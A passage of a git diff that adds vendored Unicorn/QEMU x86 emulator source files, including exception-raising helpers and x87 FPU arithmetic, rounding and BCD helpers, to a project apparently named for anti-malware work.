MMU_KNOSMAP_IDX : MMU_KSMAP_IDX; +} + +#define CC_DST (env->cc_dst) +#define CC_SRC (env->cc_src) +#define CC_SRC2 (env->cc_src2) +#define CC_OP (env->cc_op) + +/* n must be a constant to be efficient */ +static inline target_long lshift(target_long x, int n) +{ + if (n >= 0) { + return x << n; + } else { + return x >> (-n); + } +} + +/* float macros */ +#define FT0 (env->ft0) +#define ST0 (env->fpregs[env->fpstt].d) +#define ST(n) (env->fpregs[(env->fpstt + (n)) & 7].d) +#define ST1 ST(1) + +/* translate.c */ +void optimize_flags_init(struct uc_struct *); + +#include "exec/cpu-all.h" +#include "svm.h" + +#if !defined(CONFIG_USER_ONLY) +#include "hw/i386/apic.h" +#endif + +#include "exec/exec-all.h" + +static inline void cpu_get_tb_cpu_state(CPUX86State *env, target_ulong *pc, + target_ulong *cs_base, int *flags) +{ + *cs_base = env->segs[R_CS].base; + *pc = *cs_base + env->eip; + *flags = env->hflags | + (env->eflags & (IOPL_MASK | TF_MASK | RF_MASK | VM_MASK | AC_MASK)); +} + +void do_cpu_init(X86CPU *cpu); +void do_cpu_sipi(X86CPU *cpu); + +#define MCE_INJECT_BROADCAST 1 +#define MCE_INJECT_UNCOND_AO 2 + +/* excp_helper.c */ +void QEMU_NORETURN raise_exception(CPUX86State *env, int exception_index); +void QEMU_NORETURN raise_exception_err(CPUX86State *env, int exception_index, + int error_code); +void QEMU_NORETURN raise_interrupt(CPUX86State *nenv, int intno, int is_int, + int error_code, int next_eip_addend); + +/* cc_helper.c */ +extern const uint8_t parity_table[256]; +uint32_t cpu_cc_compute_all(CPUX86State *env1, int op); +void update_fp_status(CPUX86State *env); + +static inline uint32_t cpu_compute_eflags(CPUX86State *env) +{ + return (env->eflags & ~(CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C | DF_MASK)) | cpu_cc_compute_all(env, CC_OP) | (env->df & DF_MASK); +} + +/* NOTE: the translator must set DisasContext.cc_op to CC_OP_EFLAGS + * after generating a call to a helper that uses this. 
+ */ +static inline void cpu_load_eflags(CPUX86State *env, int eflags, + int update_mask) +{ + CC_SRC = eflags & (CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C); + CC_OP = CC_OP_EFLAGS; + env->df = 1 - (2 * ((eflags >> 10) & 1)); + env->eflags = (env->eflags & ~update_mask) | + (eflags & update_mask) | 0x2; +} + +/* load efer and update the corresponding hflags. XXX: do consistency + checks with cpuid bits? */ +static inline void cpu_load_efer(CPUX86State *env, uint64_t val) +{ + env->efer = val; + env->hflags &= ~(HF_LMA_MASK | HF_SVME_MASK); + if (env->efer & MSR_EFER_LMA) { + env->hflags |= HF_LMA_MASK; + } + if (env->efer & MSR_EFER_SVME) { + env->hflags |= HF_SVME_MASK; + } +} + +/* fpu_helper.c */ +void cpu_set_mxcsr(CPUX86State *env, uint32_t val); +void cpu_set_fpuc(CPUX86State *env, uint16_t val); + +/* svm_helper.c */ +void cpu_svm_check_intercept_param(CPUX86State *env1, uint32_t type, + uint64_t param); +void cpu_vmexit(CPUX86State *nenv, uint32_t exit_code, uint64_t exit_info_1); + +/* seg_helper.c */ +void do_interrupt_x86_hardirq(CPUX86State *env, int intno, int is_hw); + +void do_smm_enter(X86CPU *cpu); + +void cpu_report_tpr_access(CPUX86State *env, TPRAccess access); + +void x86_cpu_compat_set_features(const char *cpu_model, FeatureWord w, + uint32_t feat_add, uint32_t feat_remove); + +void x86_cpu_compat_kvm_no_autoenable(FeatureWord w, uint32_t features); +void x86_cpu_compat_kvm_no_autodisable(FeatureWord w, uint32_t features); + + +/* Return name of 32-bit register, from a R_* constant */ +const char *get_register_name_32(unsigned int reg); + +uint32_t x86_cpu_apic_id_from_index(unsigned int cpu_index); +void enable_compat_apic_id_mode(void); + +#define APIC_DEFAULT_ADDRESS 0xfee00000 +#define APIC_SPACE_SIZE 0x100000 + +#endif /* CPU_I386_H */ diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/excp_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/excp_helper.c new file mode 100644 index 0000000..7aea373 --- 
/dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/excp_helper.c @@ -0,0 +1,133 @@ +/* + * x86 exception helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include "cpu.h" +#include "qemu/log.h" +#include "sysemu/sysemu.h" +#include "exec/helper-proto.h" + +#include "uc_priv.h" + +#if 0 +#define raise_exception_err(env, a, b) \ + do { \ + qemu_log("raise_exception line=%d\n", __LINE__); \ + (raise_exception_err)(env, a, b); \ + } while (0) +#endif + +void helper_raise_interrupt(CPUX86State *env, int intno, int next_eip_addend) +{ + raise_interrupt(env, intno, 1, 0, next_eip_addend); +} + +void helper_raise_exception(CPUX86State *env, int exception_index) +{ + raise_exception(env, exception_index); +} + +/* + * Check nested exceptions and change to double or triple fault if + * needed. It should only be called, if this is not an interrupt. + * Returns the new exception number. 
+ */ +static int check_exception(CPUX86State *env, int intno, int *error_code) +{ + int first_contributory = env->old_exception == 0 || + (env->old_exception >= 10 && + env->old_exception <= 13); + int second_contributory = intno == 0 || + (intno >= 10 && intno <= 13); + + qemu_log_mask(CPU_LOG_INT, "check_exception old: 0x%x new 0x%x\n", + env->old_exception, intno); + +#if !defined(CONFIG_USER_ONLY) + if (env->old_exception == EXCP08_DBLE) { + if (env->hflags & HF_SVMI_MASK) { + cpu_vmexit(env, SVM_EXIT_SHUTDOWN, 0); /* does not return */ + } + + qemu_log_mask(CPU_LOG_RESET, "Triple fault\n"); + + qemu_system_reset_request(env->uc); + return EXCP_HLT; + } +#endif + + if ((first_contributory && second_contributory) + || (env->old_exception == EXCP0E_PAGE && + (second_contributory || (intno == EXCP0E_PAGE)))) { + intno = EXCP08_DBLE; + *error_code = 0; + } + + if (second_contributory || (intno == EXCP0E_PAGE) || + (intno == EXCP08_DBLE)) { + env->old_exception = intno; + } + + return intno; +} + +/* + * Signal an interruption. It is executed in the main CPU loop. + * is_int is TRUE if coming from the int instruction. next_eip is the + * env->eip value AFTER the interrupt instruction. It is only relevant if + * is_int is TRUE. 
+ */ +static void QEMU_NORETURN raise_interrupt2(CPUX86State *env, int intno, + int is_int, int error_code, + int next_eip_addend) +{ + CPUState *cs = CPU(x86_env_get_cpu(env)); + + if (!is_int) { + cpu_svm_check_intercept_param(env, SVM_EXIT_EXCP_BASE + intno, + error_code); + intno = check_exception(env, intno, &error_code); + } else { + cpu_svm_check_intercept_param(env, SVM_EXIT_SWINT, 0); + } + + cs->exception_index = intno; // qq + env->error_code = error_code; + env->exception_is_int = is_int; + env->exception_next_eip = env->eip + next_eip_addend; + cpu_loop_exit(cs); +} + +/* shortcuts to generate exceptions */ + +void QEMU_NORETURN raise_interrupt(CPUX86State *env, int intno, int is_int, + int error_code, int next_eip_addend) +{ + raise_interrupt2(env, intno, is_int, error_code, next_eip_addend); +} + +void raise_exception_err(CPUX86State *env, int exception_index, + int error_code) +{ + raise_interrupt2(env, exception_index, 0, error_code, 0); +} + +void raise_exception(CPUX86State *env, int exception_index) +{ + raise_interrupt2(env, exception_index, 0, 0, 0); +} diff --git a/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/fpu_helper.c b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/fpu_helper.c new file mode 100644 index 0000000..f121175 --- /dev/null +++ b/ai_anti_malware/unicorn/unicorn-master/qemu/target-i386/fpu_helper.c @@ -0,0 +1,1317 @@ +/* + * x86 FPU, MMX/3DNow!/SSE/SSE2/SSE3/SSSE3/SSE4/PNI helpers + * + * Copyright (c) 2003 Fabrice Bellard + * + * This library is free software; you can redistribute it and/or + * modify it under the terms of the GNU Lesser General Public + * License as published by the Free Software Foundation; either + * version 2 of the License, or (at your option) any later version. + * + * This library is distributed in the hope that it will be useful, + * but WITHOUT ANY WARRANTY; without even the implied warranty of + * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the GNU + * Lesser General Public License for more details. + * + * You should have received a copy of the GNU Lesser General Public + * License along with this library; if not, see . + */ + +#include +#include "cpu.h" +#include "exec/helper-proto.h" +#include "qemu/aes.h" +#include "qemu/host-utils.h" +#include "exec/cpu_ldst.h" + +#define FPU_RC_MASK 0xc00 +#define FPU_RC_NEAR 0x000 +#define FPU_RC_DOWN 0x400 +#define FPU_RC_UP 0x800 +#define FPU_RC_CHOP 0xc00 + +#define MAXTAN 9223372036854775808.0 + +/* the following deal with x86 long double-precision numbers */ +#define MAXEXPD 0x7fff +#define EXPBIAS 16383 +#define EXPD(fp) (fp.l.upper & 0x7fff) +#define SIGND(fp) ((fp.l.upper) & 0x8000) +#define MANTD(fp) (fp.l.lower) +#define BIASEXPONENT(fp) fp.l.upper = (fp.l.upper & ~(0x7fff)) | EXPBIAS + +#define FPUS_IE (1 << 0) +#define FPUS_DE (1 << 1) +#define FPUS_ZE (1 << 2) +#define FPUS_OE (1 << 3) +#define FPUS_UE (1 << 4) +#define FPUS_PE (1 << 5) +#define FPUS_SF (1 << 6) +#define FPUS_SE (1 << 7) +#define FPUS_B (1 << 15) + +#define FPUC_EM 0x3f + +#define floatx80_lg2 make_floatx80(0x3ffd, 0x9a209a84fbcff799LL) +#define floatx80_l2e make_floatx80(0x3fff, 0xb8aa3b295c17f0bcLL) +#define floatx80_l2t make_floatx80(0x4000, 0xd49a784bcd1b8afeLL) + +static inline void fpush(CPUX86State *env) +{ + env->fpstt = (env->fpstt - 1) & 7; + env->fptags[env->fpstt] = 0; /* validate stack entry */ +} + +static inline void fpop(CPUX86State *env) +{ + env->fptags[env->fpstt] = 1; /* invalidate stack entry */ + env->fpstt = (env->fpstt + 1) & 7; +} + +static inline floatx80 helper_fldt(CPUX86State *env, target_ulong ptr) +{ + CPU_LDoubleU temp; + + temp.l.lower = cpu_ldq_data(env, ptr); + temp.l.upper = cpu_lduw_data(env, ptr + 8); + return temp.d; +} + +static inline void helper_fstt(CPUX86State *env, floatx80 f, target_ulong ptr) +{ + CPU_LDoubleU temp; + + temp.d = f; + cpu_stq_data(env, ptr, temp.l.lower); + cpu_stw_data(env, ptr + 8, temp.l.upper); +} + +/* x87 FPU 
helpers */ + +static inline double floatx80_to_double(CPUX86State *env, floatx80 a) +{ + union { + float64 f64; + double d; + } u; + + u.f64 = floatx80_to_float64(a, &env->fp_status); + return u.d; +} + +static inline floatx80 double_to_floatx80(CPUX86State *env, double a) +{ + union { + float64 f64; + double d; + } u; + + u.d = a; + return float64_to_floatx80(u.f64, &env->fp_status); +} + +static void fpu_set_exception(CPUX86State *env, int mask) +{ + env->fpus |= mask; + if (env->fpus & (~env->fpuc & FPUC_EM)) { + env->fpus |= FPUS_SE | FPUS_B; + } +} + +static inline floatx80 helper_fdiv(CPUX86State *env, floatx80 a, floatx80 b) +{ + if (floatx80_is_zero(b)) { + fpu_set_exception(env, FPUS_ZE); + } + return floatx80_div(a, b, &env->fp_status); +} + +static void fpu_raise_exception(CPUX86State *env) +{ + if (env->cr[0] & CR0_NE_MASK) { + raise_exception(env, EXCP10_COPR); + } +#if !defined(CONFIG_USER_ONLY) + else { + cpu_set_ferr(env); + } +#endif +} + +void helper_flds_FT0(CPUX86State *env, uint32_t val) +{ + union { + float32 f; + uint32_t i; + } u; + + u.i = val; + FT0 = float32_to_floatx80(u.f, &env->fp_status); +} + +void helper_fldl_FT0(CPUX86State *env, uint64_t val) +{ + union { + float64 f; + uint64_t i; + } u; + + u.i = val; + FT0 = float64_to_floatx80(u.f, &env->fp_status); +} + +void helper_fildl_FT0(CPUX86State *env, int32_t val) +{ + FT0 = int32_to_floatx80(val, &env->fp_status); +} + +void helper_flds_ST0(CPUX86State *env, uint32_t val) +{ + int new_fpstt; + union { + float32 f; + uint32_t i; + } u; + + new_fpstt = (env->fpstt - 1) & 7; + u.i = val; + env->fpregs[new_fpstt].d = float32_to_floatx80(u.f, &env->fp_status); + env->fpstt = new_fpstt; + env->fptags[new_fpstt] = 0; /* validate stack entry */ +} + +void helper_fldl_ST0(CPUX86State *env, uint64_t val) +{ + int new_fpstt; + union { + float64 f; + uint64_t i; + } u; + + new_fpstt = (env->fpstt - 1) & 7; + u.i = val; + env->fpregs[new_fpstt].d = float64_to_floatx80(u.f, &env->fp_status); + 
env->fpstt = new_fpstt; + env->fptags[new_fpstt] = 0; /* validate stack entry */ +} + +void helper_fildl_ST0(CPUX86State *env, int32_t val) +{ + int new_fpstt; + + new_fpstt = (env->fpstt - 1) & 7; + env->fpregs[new_fpstt].d = int32_to_floatx80(val, &env->fp_status); + env->fpstt = new_fpstt; + env->fptags[new_fpstt] = 0; /* validate stack entry */ +} + +void helper_fildll_ST0(CPUX86State *env, int64_t val) +{ + int new_fpstt; + + new_fpstt = (env->fpstt - 1) & 7; + env->fpregs[new_fpstt].d = int64_to_floatx80(val, &env->fp_status); + env->fpstt = new_fpstt; + env->fptags[new_fpstt] = 0; /* validate stack entry */ +} + +uint32_t helper_fsts_ST0(CPUX86State *env) +{ + union { + float32 f; + uint32_t i; + } u; + + u.f = floatx80_to_float32(ST0, &env->fp_status); + return u.i; +} + +uint64_t helper_fstl_ST0(CPUX86State *env) +{ + union { + float64 f; + uint64_t i; + } u; + + u.f = floatx80_to_float64(ST0, &env->fp_status); + return u.i; +} + +int32_t helper_fist_ST0(CPUX86State *env) +{ + int32_t val; + + val = floatx80_to_int32(ST0, &env->fp_status); + if (val != (int16_t)val) { + val = -32768; + } + return val; +} + +int32_t helper_fistl_ST0(CPUX86State *env) +{ + int32_t val; + + val = floatx80_to_int32(ST0, &env->fp_status); + return val; +} + +int64_t helper_fistll_ST0(CPUX86State *env) +{ + int64_t val; + + val = floatx80_to_int64(ST0, &env->fp_status); + return val; +} + +int32_t helper_fistt_ST0(CPUX86State *env) +{ + int32_t val; + + val = floatx80_to_int32_round_to_zero(ST0, &env->fp_status); + if (val != (int16_t)val) { + val = -32768; + } + return val; +} + +int32_t helper_fisttl_ST0(CPUX86State *env) +{ + int32_t val; + + val = floatx80_to_int32_round_to_zero(ST0, &env->fp_status); + return val; +} + +int64_t helper_fisttll_ST0(CPUX86State *env) +{ + int64_t val; + + val = floatx80_to_int64_round_to_zero(ST0, &env->fp_status); + return val; +} + +void helper_fldt_ST0(CPUX86State *env, target_ulong ptr) +{ + int new_fpstt; + + new_fpstt = (env->fpstt - 1) 
& 7; + env->fpregs[new_fpstt].d = helper_fldt(env, ptr); + env->fpstt = new_fpstt; + env->fptags[new_fpstt] = 0; /* validate stack entry */ +} + +void helper_fstt_ST0(CPUX86State *env, target_ulong ptr) +{ + helper_fstt(env, ST0, ptr); +} + +void helper_fpush(CPUX86State *env) +{ + fpush(env); +} + +void helper_fpop(CPUX86State *env) +{ + fpop(env); +} + +void helper_fdecstp(CPUX86State *env) +{ + env->fpstt = (env->fpstt - 1) & 7; + env->fpus &= ~0x4700; +} + +void helper_fincstp(CPUX86State *env) +{ + env->fpstt = (env->fpstt + 1) & 7; + env->fpus &= ~0x4700; +} + +/* FPU move */ + +void helper_ffree_STN(CPUX86State *env, int st_index) +{ + env->fptags[(env->fpstt + st_index) & 7] = 1; +} + +void helper_fmov_ST0_FT0(CPUX86State *env) +{ + ST0 = FT0; +} + +void helper_fmov_FT0_STN(CPUX86State *env, int st_index) +{ + FT0 = ST(st_index); +} + +void helper_fmov_ST0_STN(CPUX86State *env, int st_index) +{ + ST0 = ST(st_index); +} + +void helper_fmov_STN_ST0(CPUX86State *env, int st_index) +{ + ST(st_index) = ST0; +} + +void helper_fxchg_ST0_STN(CPUX86State *env, int st_index) +{ + floatx80 tmp; + + tmp = ST(st_index); + ST(st_index) = ST0; + ST0 = tmp; +} + +/* FPU operations */ + +static const int fcom_ccval[4] = {0x0100, 0x4000, 0x0000, 0x4500}; + +void helper_fcom_ST0_FT0(CPUX86State *env) +{ + int ret; + + ret = floatx80_compare(ST0, FT0, &env->fp_status); + env->fpus = (env->fpus & ~0x4500) | fcom_ccval[ret + 1]; +} + +void helper_fucom_ST0_FT0(CPUX86State *env) +{ + int ret; + + ret = floatx80_compare_quiet(ST0, FT0, &env->fp_status); + env->fpus = (env->fpus & ~0x4500) | fcom_ccval[ret + 1]; +} + +static const int fcomi_ccval[4] = {CC_C, CC_Z, 0, CC_Z | CC_P | CC_C}; + +void helper_fcomi_ST0_FT0(CPUX86State *env) +{ + int eflags; + int ret; + + ret = floatx80_compare(ST0, FT0, &env->fp_status); + eflags = cpu_cc_compute_all(env, CC_OP); + eflags = (eflags & ~(CC_Z | CC_P | CC_C)) | fcomi_ccval[ret + 1]; + CC_SRC = eflags; +} + +void 
helper_fucomi_ST0_FT0(CPUX86State *env) +{ + int eflags; + int ret; + + ret = floatx80_compare_quiet(ST0, FT0, &env->fp_status); + eflags = cpu_cc_compute_all(env, CC_OP); + eflags = (eflags & ~(CC_Z | CC_P | CC_C)) | fcomi_ccval[ret + 1]; + CC_SRC = eflags; +} + +void helper_fadd_ST0_FT0(CPUX86State *env) +{ + ST0 = floatx80_add(ST0, FT0, &env->fp_status); +} + +void helper_fmul_ST0_FT0(CPUX86State *env) +{ + ST0 = floatx80_mul(ST0, FT0, &env->fp_status); +} + +void helper_fsub_ST0_FT0(CPUX86State *env) +{ + ST0 = floatx80_sub(ST0, FT0, &env->fp_status); +} + +void helper_fsubr_ST0_FT0(CPUX86State *env) +{ + ST0 = floatx80_sub(FT0, ST0, &env->fp_status); +} + +void helper_fdiv_ST0_FT0(CPUX86State *env) +{ + ST0 = helper_fdiv(env, ST0, FT0); +} + +void helper_fdivr_ST0_FT0(CPUX86State *env) +{ + ST0 = helper_fdiv(env, FT0, ST0); +} + +/* fp operations between STN and ST0 */ + +void helper_fadd_STN_ST0(CPUX86State *env, int st_index) +{ + ST(st_index) = floatx80_add(ST(st_index), ST0, &env->fp_status); +} + +void helper_fmul_STN_ST0(CPUX86State *env, int st_index) +{ + ST(st_index) = floatx80_mul(ST(st_index), ST0, &env->fp_status); +} + +void helper_fsub_STN_ST0(CPUX86State *env, int st_index) +{ + ST(st_index) = floatx80_sub(ST(st_index), ST0, &env->fp_status); +} + +void helper_fsubr_STN_ST0(CPUX86State *env, int st_index) +{ + ST(st_index) = floatx80_sub(ST0, ST(st_index), &env->fp_status); +} + +void helper_fdiv_STN_ST0(CPUX86State *env, int st_index) +{ + floatx80 *p; + + p = &ST(st_index); + *p = helper_fdiv(env, *p, ST0); +} + +void helper_fdivr_STN_ST0(CPUX86State *env, int st_index) +{ + floatx80 *p; + + p = &ST(st_index); + *p = helper_fdiv(env, ST0, *p); +} + +/* misc FPU operations */ +void helper_fchs_ST0(CPUX86State *env) +{ + ST0 = floatx80_chs(ST0); +} + +void helper_fabs_ST0(CPUX86State *env) +{ + ST0 = floatx80_abs(ST0); +} + +void helper_fld1_ST0(CPUX86State *env) +{ + //ST0 = floatx80_one; + floatx80 one = { 0x8000000000000000LL, 0x3fff }; + ST0 
= one; +} + +void helper_fldl2t_ST0(CPUX86State *env) +{ + //ST0 = floatx80_l2t; + floatx80 l2t = { 0xd49a784bcd1b8afeLL, 0x4000 }; + ST0 = l2t; +} + +void helper_fldl2e_ST0(CPUX86State *env) +{ + //ST0 = floatx80_l2e; + floatx80 l2e = { 0xb8aa3b295c17f0bcLL, 0x3fff }; + ST0 = l2e; +} + +void helper_fldpi_ST0(CPUX86State *env) +{ + //ST0 = floatx80_pi; + floatx80 pi = { 0xc90fdaa22168c235LL, 0x4000 }; + ST0 = pi; +} + +void helper_fldlg2_ST0(CPUX86State *env) +{ + //ST0 = floatx80_lg2; + floatx80 lg2 = { 0x9a209a84fbcff799LL, 0x3ffd }; + ST0 = lg2; +} + +void helper_fldln2_ST0(CPUX86State *env) +{ + //ST0 = floatx80_ln2; + floatx80 ln2 = { 0xb17217f7d1cf79acLL, 0x3ffe }; + ST0 = ln2; +} + +void helper_fldz_ST0(CPUX86State *env) +{ + //ST0 = floatx80_zero; + floatx80 zero = { 0x0000000000000000LL, 0x0000 }; + ST0 = zero; +} + +void helper_fldz_FT0(CPUX86State *env) +{ + //FT0 = floatx80_zero; + floatx80 zero = { 0x0000000000000000LL, 0x0000 }; + ST0 = zero; +} + +uint32_t helper_fnstsw(CPUX86State *env) +{ + return (env->fpus & ~0x3800) | (env->fpstt & 0x7) << 11; +} + +uint32_t helper_fnstcw(CPUX86State *env) +{ + return env->fpuc; +} + +void update_fp_status(CPUX86State *env) +{ + int rnd_type; + + /* set rounding mode */ + switch (env->fpuc & FPU_RC_MASK) { + default: + case FPU_RC_NEAR: + rnd_type = float_round_nearest_even; + break; + case FPU_RC_DOWN: + rnd_type = float_round_down; + break; + case FPU_RC_UP: + rnd_type = float_round_up; + break; + case FPU_RC_CHOP: + rnd_type = float_round_to_zero; + break; + } + set_float_rounding_mode(rnd_type, &env->fp_status); + switch ((env->fpuc >> 8) & 3) { + case 0: + rnd_type = 32; + break; + case 2: + rnd_type = 64; + break; + case 3: + default: + rnd_type = 80; + break; + } + set_floatx80_rounding_precision(rnd_type, &env->fp_status); +} + +void helper_fldcw(CPUX86State *env, uint32_t val) +{ + cpu_set_fpuc(env, val); +} + +void helper_fclex(CPUX86State *env) +{ + env->fpus &= 0x7f00; +} + +void 
helper_fwait(CPUX86State *env) +{ + if (env->fpus & FPUS_SE) { + fpu_raise_exception(env); + } +} + +void helper_fninit(CPUX86State *env) +{ + env->fpus = 0; + env->fpstt = 0; + cpu_set_fpuc(env, 0x37f); + env->fptags[0] = 1; + env->fptags[1] = 1; + env->fptags[2] = 1; + env->fptags[3] = 1; + env->fptags[4] = 1; + env->fptags[5] = 1; + env->fptags[6] = 1; + env->fptags[7] = 1; +} + +/* BCD ops */ + +void helper_fbld_ST0(CPUX86State *env, target_ulong ptr) +{ + floatx80 tmp; + uint64_t val; + unsigned int v; + int i; + + val = 0; + for (i = 8; i >= 0; i--) { + v = cpu_ldub_data(env, ptr + i); + val = (val * 100) + ((v >> 4) * 10) + (v & 0xf); + } + tmp = int64_to_floatx80(val, &env->fp_status); + if (cpu_ldub_data(env, ptr + 9) & 0x80) { + floatx80_chs(tmp); + } + fpush(env); + ST0 = tmp; +} + +void helper_fbst_ST0(CPUX86State *env, target_ulong ptr) +{ + int v; + target_ulong mem_ref, mem_end; + int64_t val; + + val = floatx80_to_int64(ST0, &env->fp_status); + mem_ref = ptr; + mem_end = mem_ref + 9; + if (val < 0) { + cpu_stb_data(env, mem_end, 0x80); + if (val != 0x8000000000000000LL) { + val = -val; + } + } else { + cpu_stb_data(env, mem_end, 0x00); + } + while (mem_ref < mem_end) { + if (val == 0) { + break; + } + v = val % 100; + val = val / 100; + v = (int)((unsigned int)(v / 10) << 4) | (v % 10); + cpu_stb_data(env, mem_ref++, v); + } + while (mem_ref < mem_end) { + cpu_stb_data(env, mem_ref++, 0); + } +} + +void helper_f2xm1(CPUX86State *env) +{ + double val = floatx80_to_double(env, ST0); + + val = pow(2.0, val) - 1.0; + ST0 = double_to_floatx80(env, val); +} + +void helper_fyl2x(CPUX86State *env) +{ + double fptemp = floatx80_to_double(env, ST0); + + if (fptemp > 0.0) { + fptemp = log(fptemp) / log(2.0); /* log2(ST) */ + fptemp *= floatx80_to_double(env, ST1); + ST1 = double_to_floatx80(env, fptemp); + fpop(env); + } else { + env->fpus &= ~0x4700; + env->fpus |= 0x400; + } +} + +void helper_fptan(CPUX86State *env) +{ + double fptemp = 
floatx80_to_double(env, ST0); + + if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { + env->fpus |= 0x400; + } else { + floatx80 one = { 0x8000000000000000LL, 0x3fff }; + fptemp = tan(fptemp); + ST0 = double_to_floatx80(env, fptemp); + fpush(env); + ST0 = one; + env->fpus &= ~0x400; /* C2 <-- 0 */ + /* the above code is for |arg| < 2**52 only */ + } +} + +void helper_fpatan(CPUX86State *env) +{ + double fptemp, fpsrcop; + + fpsrcop = floatx80_to_double(env, ST1); + fptemp = floatx80_to_double(env, ST0); + ST1 = double_to_floatx80(env, atan2(fpsrcop, fptemp)); + fpop(env); +} + +void helper_fxtract(CPUX86State *env) +{ + CPU_LDoubleU temp; + + temp.d = ST0; + + if (floatx80_is_zero(ST0)) { + /* Easy way to generate -inf and raising division by 0 exception */ + floatx80 zero = { 0x0000000000000000LL, 0x0000 }; + floatx80 one = { 0x8000000000000000LL, 0x3fff }; + ST0 = floatx80_div(floatx80_chs(one), zero, + &env->fp_status); + fpush(env); + ST0 = temp.d; + } else { + int expdif; + + expdif = EXPD(temp) - EXPBIAS; + /* DP exponent bias */ + ST0 = int32_to_floatx80(expdif, &env->fp_status); + fpush(env); + BIASEXPONENT(temp); + ST0 = temp.d; + } +} + +void helper_fprem1(CPUX86State *env) +{ + double st0, st1, dblq, fpsrcop, fptemp; + CPU_LDoubleU fpsrcop1, fptemp1; + int expdif; + signed long long int q; + + st0 = floatx80_to_double(env, ST0); + st1 = floatx80_to_double(env, ST1); + + if (isinf(st0) || isnan(st0) || isnan(st1) || (st1 == 0.0)) { + ST0 = double_to_floatx80(env, NAN); /* NaN */ + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + return; + } + + fpsrcop = st0; + fptemp = st1; + fpsrcop1.d = ST0; + fptemp1.d = ST1; + expdif = EXPD(fpsrcop1) - EXPD(fptemp1); + + if (expdif < 0) { + /* optimisation? 
taken from the AMD docs */ + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + /* ST0 is unchanged */ + return; + } + + if (expdif < 53) { + dblq = fpsrcop / fptemp; + /* round dblq towards nearest integer */ + dblq = rint(dblq); + st0 = fpsrcop - fptemp * dblq; + + /* convert dblq to q by truncating towards zero */ + if (dblq < 0.0) { + q = (signed long long int)(-dblq); + } else { + q = (signed long long int)dblq; + } + + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + /* (C0,C3,C1) <-- (q2,q1,q0) */ + env->fpus |= (q & 0x4) << (8 - 2); /* (C0) <-- q2 */ + env->fpus |= (q & 0x2) << (14 - 1); /* (C3) <-- q1 */ + env->fpus |= (q & 0x1) << (9 - 0); /* (C1) <-- q0 */ + } else { + env->fpus |= 0x400; /* C2 <-- 1 */ + fptemp = pow(2.0, expdif - 50); + fpsrcop = (st0 / st1) / fptemp; + /* fpsrcop = integer obtained by chopping */ + fpsrcop = (fpsrcop < 0.0) ? + -(floor(fabs(fpsrcop))) : floor(fpsrcop); + st0 -= (st1 * fpsrcop * fptemp); + } + ST0 = double_to_floatx80(env, st0); +} + +void helper_fprem(CPUX86State *env) +{ + double st0, st1, dblq, fpsrcop, fptemp; + CPU_LDoubleU fpsrcop1, fptemp1; + int expdif; + signed long long int q; + + st0 = floatx80_to_double(env, ST0); + st1 = floatx80_to_double(env, ST1); + + if (isinf(st0) || isnan(st0) || isnan(st1) || (st1 == 0.0)) { + ST0 = double_to_floatx80(env, NAN); /* NaN */ + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + return; + } + + fpsrcop = st0; + fptemp = st1; + fpsrcop1.d = ST0; + fptemp1.d = ST1; + expdif = EXPD(fpsrcop1) - EXPD(fptemp1); + + if (expdif < 0) { + /* optimisation? taken from the AMD docs */ + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + /* ST0 is unchanged */ + return; + } + + if (expdif < 53) { + dblq = fpsrcop / fptemp; /* ST0 / ST1 */ + /* round dblq towards zero */ + dblq = (dblq < 0.0) ? 
ceil(dblq) : floor(dblq); + st0 = fpsrcop - fptemp * dblq; /* fpsrcop is ST0 */ + + /* convert dblq to q by truncating towards zero */ + if (dblq < 0.0) { + q = (signed long long int)(-dblq); + } else { + q = (signed long long int)dblq; + } + + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + /* (C0,C3,C1) <-- (q2,q1,q0) */ + env->fpus |= (q & 0x4) << (8 - 2); /* (C0) <-- q2 */ + env->fpus |= (q & 0x2) << (14 - 1); /* (C3) <-- q1 */ + env->fpus |= (q & 0x1) << (9 - 0); /* (C1) <-- q0 */ + } else { + int N = 32 + (expdif % 32); /* as per AMD docs */ + + env->fpus |= 0x400; /* C2 <-- 1 */ + fptemp = pow(2.0, (double)(expdif - N)); + fpsrcop = (st0 / st1) / fptemp; + /* fpsrcop = integer obtained by chopping */ + fpsrcop = (fpsrcop < 0.0) ? + -(floor(fabs(fpsrcop))) : floor(fpsrcop); + st0 -= (st1 * fpsrcop * fptemp); + } + ST0 = double_to_floatx80(env, st0); +} + +void helper_fyl2xp1(CPUX86State *env) +{ + double fptemp = floatx80_to_double(env, ST0); + + if ((fptemp + 1.0) > 0.0) { + fptemp = log(fptemp + 1.0) / log(2.0); /* log2(ST + 1.0) */ + fptemp *= floatx80_to_double(env, ST1); + ST1 = double_to_floatx80(env, fptemp); + fpop(env); + } else { + env->fpus &= ~0x4700; + env->fpus |= 0x400; + } +} + +void helper_fsqrt(CPUX86State *env) +{ + if (floatx80_is_neg(ST0)) { + env->fpus &= ~0x4700; /* (C3,C2,C1,C0) <-- 0000 */ + env->fpus |= 0x400; + } + ST0 = floatx80_sqrt(ST0, &env->fp_status); +} + +void helper_fsincos(CPUX86State *env) +{ + double fptemp = floatx80_to_double(env, ST0); + + if ((fptemp > MAXTAN) || (fptemp < -MAXTAN)) { + env->fpus |= 